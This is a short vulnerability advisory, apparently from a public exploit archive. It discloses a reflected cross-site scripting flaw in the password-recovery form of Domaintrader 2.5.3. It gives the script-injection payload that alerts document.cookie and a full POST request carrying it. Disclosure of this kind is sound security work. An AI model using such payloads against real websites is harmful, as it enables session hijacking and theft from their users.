Domaintrader 2.5.3 Cross Site Scripting

Domaintrader version 2.5.3 suffers from a cross site scripting vulnerability.


MD5 | dc1c864f7a15e92472ce43f6942eed41

i>>?#  Domaintrader v.2.5.3 Cross-Site Scripting
# 6th of February, 2018
# Found by Uladzislau Murashka - https://sm0k3.net
# Vendor homepage: www.smartscriptsolutions.com
# Software link: http://www.smartscriptsolutions.com/domain-trader/
# Version of local application copy: 2.5.2 but valid also for 2.5.3
# Tested on: Debian / PHP 5.x / Mozilla Firefox 56.0 (demo environment)
# CVE: None (https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS))

Vulnerable page: http://domaintrader.smartscriptsolutions.com/demo/2.5.3/recoverlogin.php
Exploit can be executed with POST request for password recovery:
Vulnerable field: <input name="email_address" id="email_address" value="" type="text">
Parameter "email_address=" is not filtered properly and also shows in output data from this field not filtered with any HTML char.

Used payload: ></SCRIPT>">'><SCRIPT>alert(document.cookie)</SCRIPT>

Example request on test environment:
POST /test/2.5.2/recoverlogin.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Referer: http://localhost/test/2.5.2/recoverlogin.php
Cookie: PHPSESSID=c489e1n55o930d9ar0mdia2440
Connection: close
Upgrade-Insecure-Requests: 1

mode=recoverlogin&email_address=%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&Submit=Submit

By Uladzislau Murashka (https://sm0k3.net)

Related Posts

Comments